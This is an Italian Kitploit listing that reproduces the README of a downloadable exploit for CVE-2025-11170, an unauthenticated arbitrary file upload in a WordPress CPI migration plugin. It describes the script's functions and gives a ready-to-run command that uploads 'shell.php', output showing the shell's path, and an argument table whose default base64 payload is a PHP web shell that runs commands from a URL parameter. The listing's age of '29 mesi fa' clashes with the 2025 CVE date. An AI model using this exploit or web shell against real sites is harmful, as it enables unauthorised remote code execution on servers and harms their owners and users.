Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-11170 — Plugin dedicato alla migrazione WP per CPI <= 1.0.2 - Caricamento arbitrario di file non autenticato | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-11170
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2025-11170

CVE-2025-11170

Plugin dedicato alla migrazione WP per CPI <= 1.0.2 - Caricamento arbitrario di file non autenticato

Vedi Repository
29 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-11170

WP移行専用プラグイン for CPI <= 1.0.2 - Caricamento Arbitrario di File non Autenticato

🚀 WP移行専用プラグイン for CPI <= 1.0.2 - Caricamento Arbitrario di File non Autenticato

📝 Descrizione

Il plugin WP移行専用プラグイン for CPI per WordPress è vulnerabile a caricamenti arbitrari di file a causa della mancanza di validazione del tipo di file nella funzione Cpiwm_Import_Controller::import in tutte le versioni fino alla 1.0.2 inclusa.
Ciò consente ad attaccanti non autenticati di caricare file arbitrari sul server del sito interessato, potenzialmente permettendo l'esecuzione remota di codice.

🛡️ Dettagli della Vulnerabilità

  • CVE: CVE-2025-11170
  • CVSS Score: 9.8 (Critico)
  • Vettore d'Attacco: Caricamento remoto di file non autenticato

⚡ Informazioni sullo Script

  • Nome Script: CVE-2025-11170.py
  • Scopo: Exploit automatizzato per il caricamento di shell/file per il plugin di migrazione CPI vulnerabile per WordPress.

🔧 Utilizzo

Argomenti

🚦 Metodi Spiegati

  • Nxploited_parse_args
    Analizza e valida gli argomenti di input. Assicura la corretta struttura dell'endpoint, le intestazioni e la codifica dei dati.

  • Nxploited_logging
    Imposta la registrazione avanzata e la verbosità per un output dettagliato o minimo.

  • Nxploited_retry_session
    Inizializza una sessione persistente con logica di ripetizione e backoff per comunicazioni resilienti.

  • Nxploited_build_payload
    Costruisce i parametri della richiesta POST per lo sfruttamento.

  • Nxploited_send
    Esegue la richiesta POST effettiva all'endpoint vulnerabile e gestisce le risposte/errori.

  • Nxploited_output_result
    Elabora e formatta la risposta, mostrando il percorso della shell in caso di successo, o informazioni di debug altrimenti.


💡 Esempio di Utilizzo

root@kitploit:~
python3 CVE-2025-11170.py -u "http://192.168.100.74:888/wordpress/" -f "shell.php"

Esempio di Output:

root@kitploit:~
Caricamento shell...
Elaborazione risposta...
[+] Caricamento riuscito!
Percorso shell:
http://192.168.100.74:888/wordpress/wp-content/plugins/cpi-wp-migration/storage/shell.php
Nxploited
Il mio GitHub: https://github.com/Nxploited

🚨 Dichiarazione di Non Responsabilità

Questo script è fornito solo a scopo educativo.
L'uso di questo exploit su target senza autorizzazione adeguata può essere illegale.
L'autore non si assume NESSUNA responsabilità per qualsiasi uso improprio, danno o conseguenza legale.


📢 Contattami

GitHub: Nxploited
Telegram: KNxploited


Di: Nxploited (Khaled Alenazi)

Scarica lo strumento
ArgomentoDescrizione
-u, --urlURL di destinazione base (es., http://target.com/wordpress/). Lo script aggiunge automaticamente wp-admin/admin-ajax.php.
-f, --filenameNome del file o shell da caricare. Predefinito: shell.php
-d, --dataContenuto del file in base64 (o testo normale). Predefinito: PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
-i, --indexValore del campo indice. Predefinito: 0
-H, --headersIntestazioni HTTP aggiuntive (formato: X-Key:Value;K2:Value2)
-t, --timeoutTimeout per la richiesta HTTP (secondi). Predefinito: 10
--retriesNumero di tentativi. Predefinito: 3
--backoffFattore di backoff tra i tentativi (secondi). Predefinito: 0.7
-v, --verboseAumenta la verbosità per il debug (ripetibile)